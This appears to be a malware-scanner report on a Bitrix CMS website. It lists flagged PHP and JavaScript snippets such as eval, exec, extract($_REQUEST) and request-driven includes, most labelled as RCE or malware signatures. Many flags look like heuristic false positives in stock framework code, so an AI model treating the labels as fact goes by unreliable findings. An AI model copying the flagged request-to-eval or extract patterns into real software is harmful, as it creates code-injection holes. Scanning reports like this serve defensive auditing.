Size: 18.84 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 25 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/lang/".LANG."/admin/checklist.php")

Function eval Line: 305 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(<?=$arStates;?>);
        var Dialog = false;
        var current = 0;
        var next = 0;
        var prev = 0;
        var last_id = false;
        function InitState()
        {
            var el = false;
            for (var i=0;i<arStates["SECTIONS"].length;i++)
            {
                el = arStates["SECTIONS"][i];
                if (el.CHECKED == "Y")
                    BX.addClass(BX(el.ID+"_name"),"checklist-testlist-green");
                BX(el.ID+"_stat").innerHTML = "(<span class=\"checklist-testlist-passed-test\">"+el.CHECK+"</span>/"+el.TOTAL+")";
            }
            for (i=0;i<arStates["POINTS...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/main_controller.php

Size: 8.74 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($oRequest->arParameters['join_command']); $oResponse->status = "200 OK"; } else { $oResponse->status = "472 Bad Request"; $oResponse->text = GetMessage("MAIN_ADM_CONTROLLER_ERR8"); } } elseif(!$oRequest->Check()) { $oResponse->status = "403 Access Denied"; $oResponse->text = "Access Denied"; } else { switch($oRequest->operation) { case "ping": $oResponse->status = "200 OK"; break; case "register": $ticket_id = COption::GetOptionString("main", "controller_ticket", ""); list($ticket_created, ...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/message_admin.php

Size: 13.39 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 66 Warning

Double var technique is usually used for the obfuscation of malicious code

${$f}

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/dump.php

Size: 46.38 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(result))
            counter_sec = regs[1];
    }
}

function IncCounter()
{
    window.setTimeout(IncCounter, 1000);
    if (!counter_started)
        return;

    counter_sec ++;
    var ob;
    if (ob = BX('counter_field'))
    {
        var min = Math.floor(counter_sec / 60);
        var sec = counter_sec % 60;
        if (min < 10)
            min = '0' + min;
        if (sec < 10)
            sec = '0' + sec;
        ob.innerHTML = min + ':' + sec;
    }
}
window.setTimeout(IncCounter, 1000);

function GetLicenseInfo()
{
    CHttpRequest.Action = function(result)
    {
        BX('...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/partner_modules.php

Size: 18.52 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b', 'if($a["MODULE_SORT"] == $b["MODULE_SORT"]) return strcasecmp($a["MODULE_NAME"], $b["MODULE_NAME"]); return ($a["MODULE_SORT"] < $b["MODULE_SORT"])? -1 : 1;')); $stableVersionsOnly = COption::GetOptionString("main", "stable_versions_only", "Y"); $arRequestedModules = CUpdateClientPartner::GetRequestedModules(""); $arUpdateList = CUpdateClientPartner::GetUpdatesList($errorMessage, LANG, $stableVersionsOnly, $arRequestedModules, Array("fullmoduleinfo" => "Y")); $strError_...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/menu.php

Size: 24.77 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b', 'if($a["sort"] == $b["sort"]) return strcasecmp($a["text"], $b["text"]); return ($a["sort"] < $b["sort"])? -1 : 1;')); } } $settingsItems[] = array( "text" => GetMessage("MAIN_MENU_MODULE_SETTINGS"), "url" => "settings.php?lang=".LANGUAGE_ID, "title" => GetMessage("MAIN_MENU_SETTINGS_ALT"), "dynamic"=>true, "module_id"=>"main", "items_id"=>"menu_module_settings", "items"=>$aModuleItems, ); } if($USER->CanDoOperation('view_other_settings') || $USER->CanDoOperation('cache...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/php_command_line.php

Size: 10.83 kB Created: 2017-06-21 17:31:49 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($query); ob_end_flush(); printf("<hr>".GetMessage("php_cmd_exec_time")." %0.6f", microtime(1) - $stime); } require($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin_js.php"); die(); } $APPLICATION->SetTitle(GetMessage("php_cmd_title")); CJSCore::Init(array('ls')); if( $_SERVER['REQUEST_METHOD'] == 'POST' && $_POST["ajax"] === "y" && (isset($_POST["add"]) || $remove) ) { CUtil::JSPostUnescape(); require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_a...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/site_checker.php

Size: 35.03 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 242 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_REQUEST['global_test_vars'])

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(result);

                var oTable = BX('fix_table');
                if (oRow = BX('in_progress'))
                {
                    oCell = oRow.cells[1];
                }
                else
                {
                    oRow = oTable.insertRow(-1);
                    oCell = oRow.insertCell(-1);
                    oCell.style.width = '40%';
                    oCell.innerHTML = strCurrentTestName;
                    oCell = oRow.insertCell(-1);
                }

                if (strResult == '')
                {
                    oRow.setAttribute('id', 'in_progress');
                    oCell.innerHTML = '<div class="sc_progress" style="width:' + test_percent + '%">' + test_percent ...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/userfield_edit.php

Size: 17.60 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(i);
            if ( && r[1] > 0)
            {
                addNewRow('list_table');
            }
        }

    });

});
//-->
</script>
<form method="POST" Action="<?echo $APPLICATION->GetCurPage()."?lang=".urlencode(LANG)?>" ENCTYPE="multipart/form-data" name="post_form">
<? $tabControl->Begin(); ?>
<? $tabControl->BeginNextTab(); ?>
    <?if($ID):?>
    <tr>
        <td width="40%">ID:</td>
        <td width="60%"><?=$ID?></td>
    </tr>
    <?endif?>
    <tr class="adm-detail-required-field">
        <td width="40%"><?=GetMessage("USERTYPE_USER_TYPE_ID")?>:</...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/group_edit.php

Size: 28.92 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("document.form1.USER_ID_FROM_" + id);
                var ed1 = eval("document.form1.USER_ID_TO_" + id);
                ed.disabled = !obj.checked;
                ed1.disabled = !obj.checked;
            }
            </script>
            <? $ind = -1; $dbUsers = CUser::GetList(($b="id"), ($o="asc"), array("ACTIVE" => "Y")); while ($arUsers = $dbUsers->Fetch()) { $ind++; ?>
                <tr>
                    <td>
                        <input type="hidden" name="USER_ID_<?=$ind?>" value="<?=$arUsers["ID"]?>">
                        <input type="checkbox" name="USER_ID_ACT_<?=$ind?>" id="USER_ID_ACT_ID_...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/dump_list.php

Size: 15.63 kB Created: 2017-11-21 16:20:18 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(result);
            PartDownload();
        }
        CHttpRequest.Send(url);
    }

    function PartDownload()
    {
        if (!links || links.length == 0)
            return;

        var link = links.pop();
        var iframe = document.createElement('iframe');
        iframe.style.display = "none";
        iframe.src = link;
        document.body.appendChild(iframe);

        window.setTimeout(PartDownload, 10000);
    }

    function EndDump()
    {
    }
</script>
<div id="dump_result_div"></div>
<? $lAdmin->DisplayList(); echo BeginNote(); echo GetMessage("MAIN_DUMP_HEAD...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/tools/upload.php

Size: 984.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 12 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

exec($_REQUEST["mode"], array("width" => $_REQUEST["width"], "height" => $_REQUEST["height"])

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/tools.php

Size: 166.27 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 2
DescriptionMatch

Exploit download_remote_code2 Line: 3342 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($fp, "Host: ".$_SERVER["HTTP_HOST"]."\nDate: ".date("Y-m-d H:i:s")

Exploit execution Line: 3742 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/countries.php")

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(ua) != null)
                        {
                            rv = parseFloat(RegExp.$1);
                        }
                    }
                    else if (n.appName == "Netscape")
                    {
                        rv = 11;
                        re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");
                        if (re.exec(ua) != null)
                        {
                            rv = parseFloat(RegExp.$1);
                        }
                    }
                }

                return rv;
            }

        })(window, document, navigator);
JS;
return '<script type="text/javascript" data-skip-moving="true">'.str_replace(array("\n", "\t"), "", $js)."</script>"; } public static function GetScrip...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/bitrix/index.php

Size: 83.00 B Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Sign 0f37c730 Line: 2 Dangerous

Malware Signature (hash: 0f37c730)

meta http-equiv="REFRESH" content="0;

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/bitrix/coupon_activation.php

Size: 16.58 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 148 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/components/bitrix/main.post.form/templates/.default/template.php

Size: 16.90 kB Created: 2017-11-21 16:20:28 Modified: 2023-06-30 13:57:53 Dangers: 3
DescriptionMatch

Exploit execution Line: 117 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/lhe.php")

Exploit execution Line: 14 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/file.php")

Exploit execution Line: 15 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/urlpreview.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/components/bitrix/main.map/component.php

Size: 5.85 kB Created: 2017-05-21 22:21:40 Modified: 2023-06-30 13:57:53 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 157 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$full_path.".section.php")

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ".$CONDITION.";"))) continue; } $search_child = false; $search_path = ''; $full_path = ''; if ($aMenu[1] <> '') { if(preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i", $aMenu[1])) { $full_path = $aMenu[1]; } else { $full_path = trim(Rel2Abs(substr($PARENT_PATH, strlen($_SERVER["DOCUMENT_ROOT"])), $aMenu[1])); $slash_pos = strrpos($full_path, "/"); if ($slash_pos !== false) { $page = substr($full_path, $slash_pos+1); if(($pos = strpos($page, '?')) !== false) $page = substr($page,...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/components/bitrix/main.interface.grid/component.php

Size: 9.39 kB Created: 2017-05-21 22:21:40 Modified: 2023-06-30 13:57:53 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b', 'return strcmp($a["name"], $b["name"]);'); uasort($aOptions["views"], $func); $arResult["OPTIONS"] = $aOptions; $arResult["GLOBAL_OPTIONS"] = CUserOptions::GetOption("main.interface", "global", array(), 0); if($arParams["USE_THEMES"]) { if($arResult["GLOBAL_OPTIONS"]["theme_template"][SITE_TEMPLATE_ID] <> '') $arResult["GLOBAL_OPTIONS"]["theme"] = $arResult["GLOBAL_OPTIONS"]["theme_template"][SITE_TEMPLATE_ID]; if($arResult["OPTIONS"]["theme"] == '') $arResult["OPTIONS"...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/components/bitrix/main.ui.grid/templates/.default/template.php

Size: 31.21 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:53 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(<?=CUtil::phpToJSObject($arResult["DATA_FOR_EDIT"])?>);
        var defaultColumns = eval(<?=CUtil::phpToJSObject($arResult["DEFAULT_COLUMNS"])?>);
        var Grid = BX.Main.gridManager.getById('<?=$arParams["GRID_ID"]?>');
        var messages = eval(<?=CUtil::phpToJSObject($arResult["MESSAGES"])?>);

        Grid = Grid ? Grid.instance : null;

        if (Grid)
        {
            Grid.arParams.DEFAULT_COLUMNS = defaultColumns;
            Grid.arParams.MESSAGES = messages;

            if (action !== 'more')
            {
                Grid.arParams.EDITABLE_DATA ...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/components/bitrix/main.user.link/component.php

Size: 19.17 kB Created: 2017-05-21 22:21:40 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 440 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$folderPath."/card.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/wizard/utils.php

Size: 28.74 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 547 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$wizardPath."/.description.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/wizard/wizard.php

Size: 131.83 kB Created: 2017-11-21 16:20:18 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 5
DescriptionMatch

Exploit download_remote_code2 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($handler, '<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php")

Exploit download_remote_code2 Line: 3971 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($handler,
            
'<'.'?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php")

Exploit execution Line: 226 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/license_key.php')

Exploit execution Line: 2743 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/php_interface/dbconn.php")

Exploit execution Line: 44 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b', 'return strcasecmp($a, $b);')); array_unshift($arModules, "main"); return $arModules; } function GetNextStep($currentStep, $currentStepStage, $stepSuccess) { $stepIndex = array_search($currentStep, $this->arSteps); if ($currentStepStage == "utf8") { $nextStep = $currentStep; $nextStepStage = "database"; } elseif ($currentStepStage == "database" && $stepSuccess) { $nextStep = $currentStep; $nextStepStage = "files"; } else { if (!isset($this->arSteps[$stepIndex+1])) retur...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/wizard/template.php

Size: 9.12 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 42 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/wizard_sol/utils.php

Size: 13.62 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 2 Dangers: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b', 'return strcmp($a["SORT"], $b["SORT"]);')); return $arWizardTemplates; } function GetTemplatesPath($path) { $templatesPath = $path."/templates"; if (file_exists($_SERVER["DOCUMENT_ROOT"].$templatesPath."/".LANGUAGE_ID)) $templatesPath .= "/".LANGUAGE_ID; return $templatesPath; } function GetServices($wizardPath, $serviceFolder = "", $arFilter = Array()) { $arServices = Array(); $wizardPath = rtrim($wizardPath, "/"); $serviceFolder = rtrim($serviceFolder, "/"); if (LANGU...

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("?>".file_get_contents($documentRoot.$pathDir."/.access.php")); } if (!isset($PERM[$pathFile]) || !is_array($PERM[$pathFile])) $arPermisson $permissions; else $arPermisson $permissions $PERM[$pathFile]; return $GLOBALS["APPLICATION"]->SetFileAccessPermission($originalPath$arPermisson); } function AddMenuItem($menuFile$menuItem$siteID$pos = -1) { if (CModule::IncludeModule('fileman')) { $arResult CFileMan::GetMenuArray($_SERVER["DOCUMENT_ROOT"].$menuFile); $arMenuItems $arR...

Sign 11413268 Line: 313 Dangerous

Malware Signature (hash: 11413268)

eval("?>

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/wizard_sol/template.php

Size: 9.27 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 40 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/probki/index.php

Size: 98.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/probki/lang/ru/exec/index.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/probki/.parameters.php

Size: 102.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/probki/lang/ru/exec/.parameters.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/probki/.description.php

Size: 142.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/probki/lang/ru/exec/.description.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/admin_security/index.php

Size: 4.50 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 40 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/security/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/weather/index.php

Size: 99.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/weather/lang/ru/exec/index.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/weather/.parameters.php

Size: 103.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/weather/lang/ru/exec/.parameters.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/weather/.description.php

Size: 143.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/weather/lang/ru/exec/.description.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/admin_info/index.php

Size: 2.18 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 6 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/profile.php

Size: 29.00 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 7 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_POST, EXTR_SKIP)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/map/default.php

Size: 13.58 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Warns: 1 Dangers: 6
DescriptionMatch

Exploit execution Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$PARENT_PATH..trim($cmenu)

Exploit execution Line: 203 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$child_menu)

Exploit execution Line: 209 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$PARENT_PATH.".".trim($cmenu)

Exploit execution Line: 341 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$main_menu)

Exploit extract_global Line: 14 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUEST, EXTR_SKIP)

Exploit silenced_eval Line: 220 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval("return ".$CONDITION.";")

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ".$CONDITION.";"))) continue; } if (strlen($aMenu[1])>0) { $search_child = true; if(preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i", $aMenu[1])) $full_path = $aMenu[1]; else $full_path = trim(Rel2Abs($PARENT_PATH, $aMenu[1])); } else { $search_child = false; $full_path = $PARENT_PATH; } if (strlen($full_path)>0) { $FILE_ACCESS = (preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i", $full_path)) ? "R" : $APPLICATION->GetFileAccessPermission($full_path); if ($FILE_ACCESS!="D" ...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/auth/change_password.php

Size: 3.49 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 2 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUEST, EXTR_SKIP)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/auth/forgot_password.php

Size: 2.54 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 2 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUEST, EXTR_SKIP)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/auth/registration.php

Size: 6.25 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 2 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUEST, EXTR_SKIP)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/auth/authorize_registration.php

Size: 6.90 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 2 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUEST, EXTR_SKIP)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/auth/authorize.php

Size: 3.79 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 2 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUEST, EXTR_SKIP)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/ru/admin/site_checker.php

Size: 81.03 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Sign 471b95ee Line: 92 Dangerous

Malware Signature (hash: 471b95ee)

suhosin

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/en/classes/general/update_update.php

Size: 22.66 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

